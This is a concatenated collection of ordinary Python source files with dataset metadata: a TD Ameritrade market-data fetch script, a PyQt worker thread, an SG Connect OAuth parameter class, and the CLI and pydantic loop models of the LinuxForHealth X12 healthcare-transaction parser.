&fromDate={7}&toDate={8}&expMonth={9}'.format(client_id, symbol, strikeCount, includeQuotes, strategy, interval,\
options_range, fromDate, toDate, expMonth)
url = url+querystring
headers = {'Authorization': 'Bearer {0}'.format(c.access_token)}
# API requests are throttled to 120 requests / minute or 1 request every 0.5 sec
data = c.request(url=url, headers=headers)
time.sleep(0.5) # 0.5 sec delay per required API request rate <= 0.5 sec
return data
def dict2json(data:dict, filename:str):
with open(filename, "w") as f:
json.dump(data, f)
f.close()
return
# Define credentials
client_id = os.environ.get('autoTrader') # api key
client_secret = os.environ.get('autoTraderToken') # refresh token
redirect_uri = 'https://api.tdameritrade.com/v1/oauth2/token' # redirect uri - required for access token request
token_url = 'https://api.tdameritrade.com/v1/oauth2/token' # token url - issues access tokens
base_url = 'https://api.tdameritrade.com/v1/marketdata'
# Instantiate a client to request an access token
# this requires a previously issued refresh token
# stored as an environment variable, e.g. client_secret = os.environ.get('autoTraderToken')
c = Client(token_endpoint=token_url, resource_endpoint=base_url, client_id=client_id, \
client_secret=client_secret)
# Request an access token
# Requests are throttled to 120 requests / minute or 1 request every 0.5 sec
# Excessive token requests will be discouraged by TD Ameritrade - i.e. rate limiting by IP address, etc.
c.request_token(grant_type='refresh_token', refresh_token=client_secret, redirect_uri=redirect_uri)
# Price History API Request
# ref for stocks: https://www.barchart.com/stocks/most-active/price-volume-leaders
symbol = 'SPY'
data1 = api_pricehistory(symbol)
dict2json(data1, "price_history.json")
# Options Chain API Request
# ref for options symbols: https://www.barchart.com/options/most-active/stocks
# ref for API https://developer.tdameritrade.com/option-chains/apis/get/marketdata/chains
symbol = 'SPY'
strikeCount = 10
includeQuotes = True
strategy = 'ANALYTICAL'
interval = 3
options_range = 'ALL'
fromDate = '2021-03-31'
toDate = '2021-05-01'
expMonth = 'APR'
data2 = api_chains(symbol, strikeCount, includeQuotes, strategy, interval, options_range, fromDate, toDate, expMonth)
dict2json(data2, "opt_chain.json")
``` |
{
"source": "JoeWolf92/DMD-PyCalibration",
"score": 3
} |
#### File: JoeWolf92/DMD-PyCalibration/worker.py
```python
from PyQt5.QtCore import QThread, QObject, pyqtSignal, pyqtSlot
import time
class Worker(QObject):
finished = pyqtSignal()
statusCheckDMDTimer = pyqtSignal()
@pyqtSlot()
def procCounter(self): # A slot takes no params
while True:
time.sleep(30)
self.statusCheckDMDTimer.emit()
self.finished.emit()
``` |
{
"source": "joewood/ipyauth",
"score": 2
} |
#### File: ipyauth/ipyauth_widget/_params_sgconnect.py
```python
import json
from copy import deepcopy as copy
from traitlets import HasTraits, Unicode, validate, TraitError
from ._util import Util
class ParamsSgConnect(HasTraits):
"""
"""
name = Unicode()
response_type = Unicode()
domain = Unicode()
client_id = Unicode()
redirect_uri = Unicode()
audience = Unicode()
scope = Unicode()
def __init__(self,
mode='PRD', # PRD or HOM
response_type=None,
client_id=None,
redirect_uri=None,
scope=None,
dotenv_folder='.',
dotenv_file=None,
):
"""
"""
name = 'sgconnect' + mode
dic = Util.load_dotenv(dotenv_folder,
dotenv_file,
name)
for k, v in dic.items():
setattr(self, k, v)
self.name = name
# overrides
if response_type:
self.response_type = response_type
if client_id:
self.client_id = client_id
if redirect_uri:
self.redirect_uri = redirect_uri
self.scope = self.build_scope(scope)
self.data = self.build_data()
def to_dict(self):
"""
"""
d = copy(self.__dict__)
d = {k: v for k, v in d.items() if v is not None}
return d
def __repr__(self):
"""
"""
return json.dumps(self.data, sort_keys=False, indent=2)
@validate('name')
def _valid_response_type(self, proposal):
"""
"""
if not (proposal == 'sgconnectPRD' or proposal == 'sgconnectHOM'):
raise TraitError('mode must be "PRD" (default) or "HOM" (aka UAT)')
return proposal['value']
@validate('response_type')
def _valid_response_type(self, proposal):
"""
"""
elmts = proposal['value'].split(' ')
if not 'id_token' in elmts:
raise TraitError('response_type must be contain "id_token"')
if not 'token' in elmts:
raise TraitError('response_type must be contain "token"')
return proposal['value']
@validate('redirect_uri')
def _valid_redirect_uri(self, proposal):
"""
"""
if not Util.is_url(proposal['value']):
raise TraitError('redirect_uri must be a url')
return proposal['value']
@validate('scope')
def _valid_scope(self, proposal):
"""
"""
elmts = proposal['value'].split(' ')
if not ('profile' in elmts) and not ('openid' in elmts):
raise TraitError('scope must contain "profile" and "openid" and "mail"')
return proposal['value']
def build_scope(self, scope):
"""
"""
scopes = [e.strip() for e in scope.split(' ')] + ['openid', 'profile']
return ' '.join(list(set(scopes)))
def build_data(self):
"""
"""
props_params = ['name',
]
props_url_params = ['response_type',
'client_id',
'redirect_uri',
'audience',
'scope',
]
data = {}
for k in props_params:
v = getattr(self, k)
if v != '':
data[k] = v
data_url = {}
for k in props_url_params:
v = getattr(self, k)
if v != '':
data_url[k] = v
data['url_params'] = data_url
return data
``` |
{
"source": "joewright/x12",
"score": 3
} |
#### File: linuxforhealth/x12/cli.py
```python
import argparse
import json
from .encoding import X12JsonEncoder
from .io import X12SegmentReader, X12ModelReader
from typing import List
CLI_DESCRIPTION = """
The LinuxForHealth X12 CLI parses and validates X12 messages.
Messages are returned in JSON format in either a segment or transactional format.
"""
def _create_arg_parser():
"""
Creates the Argument Parser for the CLI utility.
:return: ArgumentParser
"""
parser = argparse.ArgumentParser(
prog="LinuxForHealth X12",
description=CLI_DESCRIPTION,
formatter_class=argparse.RawTextHelpFormatter,
)
mode_group = parser.add_mutually_exclusive_group()
mode_group.add_argument(
"-s", "--segment", help="Returns X12 segments", action="store_true"
)
mode_group.add_argument(
"-m", "--model", help="Returns X12 models", action="store_true"
)
parser.add_argument(
"-x",
"--exclude",
help="Exclude fields set to None in model output",
action="store_true",
)
parser.add_argument(
"-p", "--pretty", help="Pretty print output", action="store_true"
)
parser.add_argument(
"-d",
"--delimiters",
help="Include X12 delimiters in output. Only valid when -m (model mode) is used",
action="store_true",
)
parser.add_argument("file", help="The path to a ASC X12 file")
return parser
def _parse_segments(file_path: str) -> List:
"""
Parses X12 segments from an input file.
:param file_path: The path to the X12 file.
:return: List of X12 segments
"""
with X12SegmentReader(file_path) as r:
segments = []
for segment_name, segment in r.segments():
segment_data = {
f"{segment_name}{str(i).zfill(2)}": v for i, v in enumerate(segment)
}
segments.append(segment_data)
return segments
def _parse_models(
file_path: str, exclude_none: bool = False, output_delimiters: bool = False
) -> List:
"""
Parses a X12 segment model from a X12 input file.
:param file_path: The path to the X12 file.
:param exclude_none: Excludes fields set to None from the model output.
:param output_delimiters: When True delimiter metadata is included with each segment.
:return: List of X12 models
"""
with X12ModelReader(file_path, output_delimiters=output_delimiters) as r:
# if field is not set it will be omitted
# fields explicitly set to None will be included if exclude_none is True
export_params = {
"exclude_unset": True,
"exclude_none": exclude_none,
}
models = []
for m in r.models():
model_data = m.dict(**export_params)
models.append(model_data)
return models
def main():
"""
CLI module entrypoint
"""
parser = _create_arg_parser()
args = parser.parse_args()
if args.segment and args.delimiters:
parser.error("-s (segment mode) does not support -d (output delimiters)")
if args.segment:
x12_data = _parse_segments(args.file)
else:
x12_data = _parse_models(args.file, args.exclude, args.delimiters)
json_opts = {"cls": X12JsonEncoder}
if args.pretty:
json_opts["indent"] = 4
x12_json = json.dumps(x12_data, **json_opts)
print(x12_json)
```
#### File: v4010/x12_837_004010X098A1/loops.py
```python
from decimal import Decimal
from linuxforhealth.x12.models import X12SegmentGroup
from .segments import (
HeaderStSegment,
HeaderBhtSegment,
HeaderRefSegment,
Loop1000ANm1Segment,
Loop1000APerSegment,
Loop1000BNm1Segment,
Loop2000AHlSegment,
Loop2000APrvSegment,
Loop2010AaNm1Segment,
Loop2010AaRefSegment,
Loop2010AbNm1Segment,
Loop2010AbRefSegment,
Loop2000BHlSegment,
Loop2000BSbrSegment,
Loop2010BaNm1Segment,
Loop2010BaRefSegment,
Loop2010BbNm1Segment,
Loop2010BbRefSegment,
Loop2010BcNm1Segment,
Loop2010BdNm1Segment,
Loop2010BdRefSegment,
Loop2300DtpSegment,
Loop2300PwkSegment,
Loop2300Cn1Segment,
Loop2300AmtSegment,
Loop2300RefSegment,
Loop2300NteSegment,
Loop2300CrcSegment,
Loop2000CHlSegment,
Loop2000CPatSegment,
Loop2010CaNm1Segment,
Loop2010CaRefSegment,
Loop2305Cr7Segment,
Loop2305HsdSegment,
Loop2310ANm1Segment,
Loop2310APrvSegment,
Loop2310ARefSegment,
Loop2310BNm1Segment,
Loop2310BPrvSegment,
Loop2310BRefSegment,
Loop2310CNm1Segment,
Loop2310CRefSegment,
Loop2310DNm1Segment,
Loop2310DRefSegment,
Loop2310ENm1Segment,
Loop2310ERefSegment,
Loop2320SbrSegment,
Loop2320AmtSegment,
Loop2330aNm1Segment,
Loop2330aRefSegment,
Loop2330bNm1Segment,
Loop2330BPerSegment,
Loop2330BDtpSegment,
Loop2300BRefSegment,
Loop2330cNm1Segment,
Loop2330cRefSegment,
Loop2330dNm1Segment,
Loop2330dRefSegment,
Loop2330eNm1Segment,
Loop2330eRefSegment,
Loop2330fNm1Segment,
Loop2330fRefSegment,
Loop2330gNm1Segment,
Loop2330gRefSegment,
Loop2330HNm1Segment,
Loop2330HRefSegment,
Loop2400PwkSegment,
Loop2400CrcSegment,
Loop2400DtpSegment,
Loop2400Cn1Segment,
Loop2400RefSegment,
Loop2400AmtSegment,
Loop2400NteSegment,
Loop2410RefSegment,
Loop2420ANm1Segment,
Loop2420APrvSegment,
Loop2420ARefSegment,
Loop2420BNm1Segment,
Loop2420BRefSegment,
Loop2420CNm1Segment,
Loop2420CRefSegment,
Loop2420DNm1Segment,
Loop2420DRefSegment,
Loop2420ENm1Segment,
Loop2420ERefSegment,
Loop2420EPerSegment,
Loop2420FNm1Segment,
Loop2420FPrvSegment,
Loop2420FRefSegment,
Loop2420GNm1Segment,
Loop2420GRefSegment,
Loop2430DtpSegment,
Loop2010AaPerSegment,
)
from linuxforhealth.x12.v4010.segments import (
SeSegment,
CurSegment,
N3Segment,
N4Segment,
PatSegment,
DmgSegment,
ClmSegment,
K3Segment,
Cr1Segment,
Cr2Segment,
HiSegment,
CasSegment,
OiSegment,
MoaSegment,
LxSegment,
Sv1Segment,
Sv5Segment,
Cr3Segment,
Cr5Segment,
MeaSegment,
Ps1Segment,
HcpSegment,
LinSegment,
CtpSegment,
SvdSegment,
LqSegment,
FrmSegment,
)
from typing import List, Optional, Dict
from pydantic import Field, root_validator
from linuxforhealth.x12.validators import (
validate_duplicate_date_qualifiers,
validate_duplicate_amt_codes,
)
class Loop1000A(X12SegmentGroup):
"""
Loop 1000A - Submitter Name
"""
nm1_segment: Loop1000ANm1Segment
per_segment: List[Loop1000APerSegment] = Field(min_items=1, max_items=2)
class Loop1000B(X12SegmentGroup):
"""
Loop 1000B - Receiver Name
"""
nm1_segment: Loop1000BNm1Segment
class Loop2010Aa(X12SegmentGroup):
"""
Loop 2010AA - Billing Provider Name
"""
nm1_segment: Loop2010AaNm1Segment
n3_segment: N3Segment
n4_segment: N4Segment
ref_segment: Optional[List[Loop2010AaRefSegment]] = Field(max_items=16)
per_segment: Optional[List[Loop2010AaPerSegment]] = Field(max_items=2)
class Loop2010Ab(X12SegmentGroup):
"""
Loop 2010AB - Pay to Provider Name
"""
nm1_segment: Loop2010AbNm1Segment
n3_segment: N3Segment
n4_segment: N4Segment
ref_segment: Optional[List[Loop2010AbRefSegment]] = Field(max_items=5)
class Loop2010Ba(X12SegmentGroup):
"""
Loop 2010BA - Subscriber Name
"""
nm1_segment: Loop2010BaNm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
dmg_segment: Optional[DmgSegment]
ref_segment: Optional[List[Loop2010BaRefSegment]] = Field(max_items=5)
class Loop2010Bb(X12SegmentGroup):
"""
Loop 2010Bb - Payer Name
"""
nm1_segment: Loop2010BbNm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
ref_segment: Optional[List[Loop2010BbRefSegment]]
class Loop2010Bc(X12SegmentGroup):
"""
Loop 2010Bc - Responsible Party Name
"""
nm1_segment: Loop2010BcNm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
class Loop2010Bd(X12SegmentGroup):
"""
Credit/Debit Card Holder Name
"""
nm1_segment: Loop2010BdNm1Segment
ref_segment: Optional[List[Loop2010BdRefSegment]] = Field(max_items=2)
class Loop2305(X12SegmentGroup):
"""
Home Health Care Plan Information
"""
cr7_segment: Loop2305Cr7Segment
hsd_segment: Optional[List[Loop2305HsdSegment]] = Field(max_items=3)
class Loop2330H(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Supervising Provider
"""
nm1_segment: Loop2330HNm1Segment
ref_segment: List[Loop2330HRefSegment] = Field(min_items=1, max_items=3)
class Loop2330G(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Billing Provider
"""
nm1_segment: Loop2330gNm1Segment
ref_segment: List[Loop2330gRefSegment] = Field(min_items=1, max_items=3)
class Loop2330F(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Purchased Service Provider
"""
nm1_segment: Loop2330fNm1Segment
ref_segment: List[Loop2330fRefSegment] = Field(min_items=1, max_items=3)
class Loop2330E(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Rendering Provider
"""
nm1_segment: Loop2330eNm1Segment
ref_segment: List[Loop2330eRefSegment] = Field(min_items=1, max_items=3)
class Loop2330D(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Referring Provider
"""
nm1_segment: Loop2330dNm1Segment
ref_segment: List[Loop2330dRefSegment] = Field(min_items=1, max_items=3)
class Loop2330C(X12SegmentGroup):
"""
Claim - Other Subscriber Other Payer Patient Information
"""
nm1_segment: Loop2330cNm1Segment
ref_segment: List[Loop2330cRefSegment] = Field(min_items=1, max_items=3)
class Loop2330B(X12SegmentGroup):
"""
Claim - Other Payer Name
"""
nm1_segment: Loop2330bNm1Segment
per_segment: Optional[List[Loop2330BPerSegment]] = Field(max_items=2)
dtp_segment: Optional[Loop2330BDtpSegment]
ref_segment: Optional[List[Loop2300BRefSegment]] = Field(max_items=6)
class Loop2330A(X12SegmentGroup):
"""
Claim - Other Subscriber Name
"""
nm1_segment: Loop2330aNm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
ref_segment: Optional[List[Loop2330aRefSegment]] = Field(max_items=3)
class Loop2320(X12SegmentGroup):
"""
Claim Other subscriber information
"""
sbr_segment: Loop2320SbrSegment
cas_segment: Optional[List[CasSegment]] = Field(min_items=0, max_items=5)
amt_segment: Optional[List[Loop2320AmtSegment]] = Field(min_items=0, max_items=8)
oi_segment: Optional[OiSegment]
moa_segment: Optional[MoaSegment]
loop_2330a: Optional[Loop2330A]
loop_2330b: Optional[Loop2330B]
loop_2330c: Optional[List[Loop2330C]]
loop_2330d: Optional[Loop2330D]
loop_2330e: Optional[Loop2330E]
loop_2330f: Optional[Loop2330F]
loop_2330g: Optional[Loop2330G]
loop_2330h: Optional[Loop2330H]
_validate_amt_segments = root_validator(allow_reuse=True)(
validate_duplicate_amt_codes
)
class Loop2310E(X12SegmentGroup):
"""
Supervising Provider Name
"""
nm1_segment: Loop2310ENm1Segment
ref_segment: Optional[List[Loop2310ERefSegment]] = Field(max_items=5)
class Loop2310D(X12SegmentGroup):
"""
Service Facility Location
"""
nm1_segment: Loop2310DNm1Segment
n3_segment: N3Segment
n4_segment: N4Segment
ref_segment: Optional[List[Loop2310DRefSegment]]
class Loop2310C(X12SegmentGroup):
"""
Purchased Service Provider Name
"""
nm1_segment: Optional[Loop2310CNm1Segment]
ref_segment: Optional[List[Loop2310CRefSegment]] = Field(max_items=3)
class Loop2310B(X12SegmentGroup):
"""
Claim Rendering Provider
"""
nm1_segment: Loop2310BNm1Segment
prv_segment: Optional[Loop2310BPrvSegment]
ref_segment: Optional[List[Loop2310BRefSegment]] = Field(max_items=4)
class Loop2310A(X12SegmentGroup):
"""
Claim Referring Provider
"""
nm1_segment: Loop2310ANm1Segment
prv_segment: Loop2310APrvSegment
ref_segment: Optional[List[Loop2310ARefSegment]] = Field(max_items=5)
class Loop2440(X12SegmentGroup):
"""
Form Identification Code
"""
lq_segment: LqSegment
frm_segment: List[FrmSegment] = Field(min_items=1, max_items=99)
class Loop2430(X12SegmentGroup):
"""
Claim Service Line - Adjudication Information
"""
svd_segment: SvdSegment
cas_segment: Optional[List[CasSegment]]
dtp_segment: Loop2430DtpSegment
class Loop2420G(X12SegmentGroup):
"""
Claim Service Line - Other Payer Prior Auth
"""
nm1_segment: Loop2420GNm1Segment
ref_segment: List[Loop2420GRefSegment] = Field(min_items=1, max_items=2)
class Loop2420F(X12SegmentGroup):
"""
Claim Service Line - Referring Provider Name
"""
nm1_segment: Loop2420FNm1Segment
prv_segment: Optional[Loop2420FPrvSegment]
ref_segment: Optional[List[Loop2420FRefSegment]] = Field(max_items=5)
class Loop2420E(X12SegmentGroup):
"""
Claim Service Line - Ordering Provider Name
"""
nm1_segment: Loop2420ENm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
ref_segment: Optional[List[Loop2420ERefSegment]] = Field(max_items=5)
per_segment: Optional[Loop2420EPerSegment]
class Loop2420D(X12SegmentGroup):
"""
Claim Service Line - Supervising Provider Name
"""
nm1_segment: Loop2420DNm1Segment
ref_segment: Optional[List[Loop2420DRefSegment]] = Field(max_items=5)
class Loop2420C(X12SegmentGroup):
"""
Claim Service Line - Service Facility Location Name
"""
nm1_segment: Loop2420CNm1Segment
n3_segment: N3Segment
n4_segment: N4Segment
ref_segment: Optional[List[Loop2420CRefSegment]] = Field(max_items=5)
class Loop2420B(X12SegmentGroup):
"""
Claim Service Line - Purchased Service Provider
"""
nm1_segment: Loop2420BNm1Segment
ref_segment: Optional[List[Loop2420BRefSegment]] = Field(max_items=5)
class Loop2420A(X12SegmentGroup):
"""
Claim Service Line - Rendering Provider
"""
nm1_segment: Loop2420ANm1Segment
prv_segment: Optional[Loop2420APrvSegment]
ref_segment: Optional[List[Loop2420ARefSegment]] = Field(max_items=5)
class Loop2410(X12SegmentGroup):
"""
Claim Service Line - Drug Identification
"""
lin_segment: LinSegment
ctp_segment: CtpSegment
ref_segment: Optional[Loop2410RefSegment]
class Loop2400(X12SegmentGroup):
"""
Claim - Service Line
"""
lx_segment: LxSegment
sv1_segment: Sv1Segment
sv5_segment: Optional[Sv5Segment]
pwk_segment: Optional[List[Loop2400PwkSegment]] = Field(min_items=0, max_items=10)
cr1_segment: Optional[Cr1Segment]
cr2_segment: Optional[List[Cr2Segment]] = Field(max_items=5)
cr3_segment: Optional[Cr3Segment]
cr5_segment: Optional[Cr5Segment]
crc_segment: Optional[List[Loop2400CrcSegment]] = Field(max_items=10)
dtp_segment: List[Loop2400DtpSegment] = Field(min_items=1, max_items=20)
mea_segment: Optional[List[MeaSegment]] = Field(max_items=20)
cn1_segment: Optional[Loop2400Cn1Segment]
ref_segment: Optional[List[Loop2400RefSegment]] = Field(max_items=15)
amt_segment: Optional[List[Loop2400AmtSegment]] = Field(max_items=3)
k3_segment: Optional[List[K3Segment]] = Field(max_items=10)
nte_segment: Optional[Loop2400NteSegment]
ps1_segment: Optional[Ps1Segment]
hsd_segment: Optional[Loop2305HsdSegment] # reusing segment
hcp_segment: Optional[HcpSegment]
loop_2410: Optional[Loop2410]
loop_2420a: Optional[Loop2420A]
loop_2420b: Optional[Loop2420B]
loop_2420c: Optional[Loop2420C]
loop_2420d: Optional[Loop2420D]
loop_2420e: Optional[Loop2420E]
loop_2420f: Optional[Loop2420F]
loop_2420g: Optional[Loop2420G]
loop_2430: Optional[List[Loop2430]]
loop_2440: Optional[List[Loop2440]]
_validate_dtp_qualifiers = root_validator(allow_reuse=True)(
validate_duplicate_date_qualifiers
)
class Loop2300(X12SegmentGroup):
"""
Loop 2300 - Claims
"""
clm_segment: ClmSegment
dtp_segment: Optional[List[Loop2300DtpSegment]] = Field(min_items=0, max_items=17)
pwk_segment: Optional[List[Loop2300PwkSegment]] = Field(min_items=0, max_items=10)
cn1_segment: Optional[Loop2300Cn1Segment]
amt_segment: Optional[List[Loop2300AmtSegment]] = Field(max_items=3)
ref_segment: Optional[List[Loop2300RefSegment]] = Field(min_items=0, max_items=14)
k3_segment: Optional[List[K3Segment]] = Field(min_items=0, max_items=10)
nte_segment: Optional[Loop2300NteSegment]
cr1_segment: Optional[Cr1Segment]
cr2_segment: Optional[Cr2Segment]
crc_segment: Optional[List[Loop2300CrcSegment]] = Field(min_items=0, max_items=8)
hi_segment: Optional[List[HiSegment]] = Field(min_items=1, max_items=4)
hcp_segment: Optional[HcpSegment]
loop_2305: Optional[Loop2305]
loop_2310a: Optional[Loop2310A]
loop_2310b: Optional[Loop2310B]
loop_2310c: Optional[Loop2310C]
loop_2310d: Optional[Loop2310D]
loop_2310e: Optional[Loop2310E]
loop_2320: Optional[List[Loop2320]] = Field(min_items=0, max_items=10)
loop_2400: List[Loop2400] = Field(min_items=1, max_items=50)
_validate_dtp_qualifiers = root_validator(allow_reuse=True)(
validate_duplicate_date_qualifiers
)
@root_validator
def validate_claim_amounts(cls, values: Dict):
"""
Validates that CLM02 == SUM(Loop2400.SV102)
"""
claim_amount: Decimal = values.get("clm_segment").total_claim_charge_amount
line_total: Decimal = Decimal("0.0")
for line in values.get("loop_2400", []):
line_total += line.sv1_segment.line_item_charge_amount
if claim_amount != line_total:
raise ValueError(
f"Claim Amount {claim_amount} != Service Line Total {line_total}"
)
return values
class Loop2010Ca(X12SegmentGroup):
"""
Loop 2010CA Patient Name
"""
nm1_segment: Loop2010CaNm1Segment
n3_segment: N3Segment
n4_segment: N4Segment
dmg_segment: DmgSegment
ref_segment: Optional[List[Loop2010CaRefSegment]] = Field(max_items=6)
class Loop2000C(X12SegmentGroup):
"""
Loop 2000C - Patient
"""
hl_segment: Loop2000CHlSegment
pat_segment: Loop2000CPatSegment
loop_2010ca: Loop2010Ca
loop_2300: Optional[List[Loop2300]] = Field(min_items=0, max_items=100)
class Loop2000B(X12SegmentGroup):
"""
Loop 2000B - Subscriber
"""
hl_segment: Loop2000BHlSegment
sbr_segment: Loop2000BSbrSegment
pat_segment: Optional[PatSegment]
loop_2010ba: Loop2010Ba
loop_2010bb: Loop2010Bb
loop_2010bc: Optional[Loop2010Bc]
loop_2010bd: Optional[Loop2010Bd]
loop_2300: Optional[List[Loop2300]] = Field(min_items=0, max_items=100)
loop_2000c: Optional[List[Loop2000C]]
class Loop2000A(X12SegmentGroup):
"""
Loop 2000A - Billing / Pay to Provider
"""
hl_segment: Loop2000AHlSegment
prv_segment: Optional[Loop2000APrvSegment]
cur_segment: Optional[CurSegment]
loop_2010aa: Loop2010Aa
loop_2010ab: Optional[Loop2010Ab]
loop_2000b: List[Loop2000B]
class Header(X12SegmentGroup):
"""
Transaction Header Information
"""
st_segment: HeaderStSegment
bht_segment: HeaderBhtSegment
ref_segment: HeaderRefSegment
class Footer(X12SegmentGroup):
"""
Transaction Footer Information
"""
se_segment: SeSegment
```
#### File: v5010/x12_271_005010X279A1/loops.py
```python
from linuxforhealth.x12.models import X12SegmentGroup
from linuxforhealth.x12.v5010.segments import (
SeSegment,
N3Segment,
N4Segment,
TrnSegment,
DmgSegment,
HiSegment,
MpiSegment,
EbSegment,
HsdSegment,
MsgSegment,
IiiSegment,
LsSegment,
LeSegment,
PerSegment,
PrvSegment,
)
from .segments import (
HeaderStSegment,
HeaderBhtSegment,
Loop2000CHlSegment,
Loop2100BNm1Segment,
Loop2000BHlSegment,
Loop2100BRefSegment,
Loop2100BPrvSegment,
Loop2100ANm1Segment,
Loop2000AHlSegment,
Loop2000AAaaSegment,
Loop2100CNm1Segment,
Loop2100DNm1Segment,
Loop2100RefSegment,
Loop2100CInsSegment,
Loop2100DInsSegment,
Loop2100DtpSegment,
Loop2110RefSegment,
Loop2110DtpSegment,
Loop2100AAaaSegment,
Loop2100BAaaSegment,
Loop2110CAaaSegment,
Loop2120Nm1Segment,
Loop2000DHlSegment,
)
from typing import List, Optional
from pydantic import Field, root_validator
from linuxforhealth.x12.validators import validate_duplicate_ref_codes
class Header(X12SegmentGroup):
"""
Transaction Header Information
"""
st_segment: HeaderStSegment
bht_segment: HeaderBhtSegment
class Loop2120D(X12SegmentGroup):
"""
Loop 2120D
"""
nm1_segment: Loop2120Nm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
per_segment: Optional[List[PerSegment]] = Field(min_items=0, max_items=3)
prv_segment: Optional[PrvSegment]
class Loop2115D(X12SegmentGroup):
"""
Loop 2115D - Dependent Eligibility or Benefit Additional Information
"""
iii_segment: IiiSegment
ls_segment: LsSegment
loop_2120c: Optional[List[Loop2120D]] = Field(min_items=0, max_items=23)
le_segment: LeSegment
class Loop2110D(X12SegmentGroup):
"""
Loop 2110D Dependent Eligibility or Benefit Information
"""
eb_segment: EbSegment
hsd_segment: Optional[List[HsdSegment]] = Field(min_items=0, max_items=9)
ref_segment: Optional[List[Loop2110RefSegment]] = Field(min_items=0, max_items=9)
dtp_segment: Optional[List[Loop2110DtpSegment]] = Field(min_items=0, max_items=20)
aaa_segment: Optional[List[Loop2110CAaaSegment]] = Field(min_items=0, max_items=9)
msg_segment: Optional[List[MsgSegment]] = Field(min_items=0, max_items=10)
loop_2115d: Optional[List[Loop2115D]] = Field(min_items=0, max_items=10)
ls_segment: Optional[LsSegment]
loop_2120d: Optional[List[Loop2120D]] = Field(min_items=0, max_items=23)
le_segment: Optional[LeSegment]
_validate_ref_segments = root_validator(allow_reuse=True)(
validate_duplicate_ref_codes
)
class Loop2100D(X12SegmentGroup):
"""
Loop 2100D - Dependent Name
"""
nm1_segment: Loop2100DNm1Segment
ref_segment: Optional[List[Loop2100RefSegment]] = Field(min_items=0, max_items=9)
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
# Loop2100D AAA is identical to Loop2100B AAA
aaa_segment: Optional[List[Loop2100BAaaSegment]] = Field(min_items=0, max_items=9)
prv_segment: Optional[PrvSegment]
dmg_segment: Optional[DmgSegment]
ins_segment: Optional[Loop2100DInsSegment]
hi_segment: Optional[HiSegment]
dtp_segment: Optional[List[Loop2100DtpSegment]] = Field(min_items=0, max_items=9)
mpi_segment: Optional[MpiSegment]
loop_2110d: Optional[List[Loop2110D]] = Field(min_items=0)
_validate_ref_segments = root_validator(allow_reuse=True)(
validate_duplicate_ref_codes
)
class Loop2000D(X12SegmentGroup):
"""
Loop 2000D - Dependent
"""
hl_segment: Loop2000DHlSegment
trn_segment: Optional[List[TrnSegment]] = Field(min_items=0, max_items=2)
loop_2100d: Loop2100D
class Loop2120C(X12SegmentGroup):
"""
Loop 2120C Subscriber Benefit Related Entity Name
"""
nm1_segment: Loop2120Nm1Segment
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
per_segment: Optional[List[PerSegment]] = Field(min_items=0, max_items=3)
prv_segment: Optional[PrvSegment]
class Loop2115C(X12SegmentGroup):
"""
Loop 2115C - Subscriber Eligibility or Benefit Information Additional Information
"""
iii_segment: IiiSegment
ls_segment: LsSegment
loop_2120c: Optional[List[Loop2120C]] = Field(min_items=0, max_items=23)
le_segment: LeSegment
class Loop2110C(X12SegmentGroup):
"""
Loop2110C - Subscriber Eligibility or Benefit Information
"""
eb_segment: EbSegment
hsd_segment: Optional[List[HsdSegment]] = Field(min_items=0, max_items=9)
ref_segment: Optional[List[Loop2110RefSegment]] = Field(min_items=0, max_items=9)
dtp_segment: Optional[List[Loop2110DtpSegment]] = Field(min_items=0, max_items=20)
aaa_segment: Optional[List[Loop2110CAaaSegment]] = Field(min_items=0, max_items=9)
msg_segment: Optional[List[MsgSegment]] = Field(min_items=0, max_items=10)
loop_2115c: Optional[List[Loop2115C]] = Field(min_items=0, max_items=10)
ls_segment: Optional[LsSegment]
loop_2120c: Optional[List[Loop2120C]] = Field(min_items=0, max_items=23)
le_segment: Optional[LeSegment]
_validate_ref_segments = root_validator(allow_reuse=True)(
validate_duplicate_ref_codes
)
@root_validator
def validate_red_cross_eb_ref_codes(cls, values):
"""
Validates that reference identification codes are limited when American Red Cross is the eligibility benefit.
:@param values: The validated model values
"""
benefit_code = values["eb_segment"].eligibility_benefit_information
arc_ref_types = {"1W", "49", "F6", "NQ"}
ref_types = {
r.reference_identification_qualifier for r in values.get("ref_segments", [])
}
if ref_types and benefit_code == "R" and (ref_types - arc_ref_types):
raise ValueError(f"{ref_types} are not valid for American Red Cross")
return values
class Loop2100C(X12SegmentGroup):
"""
Loop 2100C - Subscriber Name
"""
nm1_segment: Loop2100CNm1Segment
ref_segment: Optional[List[Loop2100RefSegment]] = Field(min_items=0, max_items=9)
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
# Loop2100C AAA is identical to Loop2100B AAA
aaa_segment: Optional[List[Loop2100BAaaSegment]] = Field(min_items=0, max_items=9)
prv_segment: Optional[PrvSegment]
dmg_segment: Optional[DmgSegment]
ins_segment: Optional[Loop2100CInsSegment]
hi_segment: Optional[HiSegment]
dtp_segment: Optional[List[Loop2100DtpSegment]] = Field(min_items=0, max_items=9)
mpi_segment: Optional[MpiSegment]
loop_2110c: Optional[List[Loop2110C]] = Field(min_items=0)
_validate_ref_segments = root_validator(allow_reuse=True)(
validate_duplicate_ref_codes
)
class Loop2000C(X12SegmentGroup):
"""
Loop 2000C - Subscriber
"""
hl_segment: Loop2000CHlSegment
trn_segment: Optional[List[TrnSegment]] = Field(min_items=0, max_items=2)
loop_2100c: Loop2100C
loop_2000d: Optional[List[Loop2000D]] = Field(min_items=0)
class Loop2100B(X12SegmentGroup):
"""
Loop 2100B - Information Receiver Name
"""
nm1_segment: Loop2100BNm1Segment
ref_segment: Optional[List[Loop2100BRefSegment]]
n3_segment: Optional[N3Segment]
n4_segment: Optional[N4Segment]
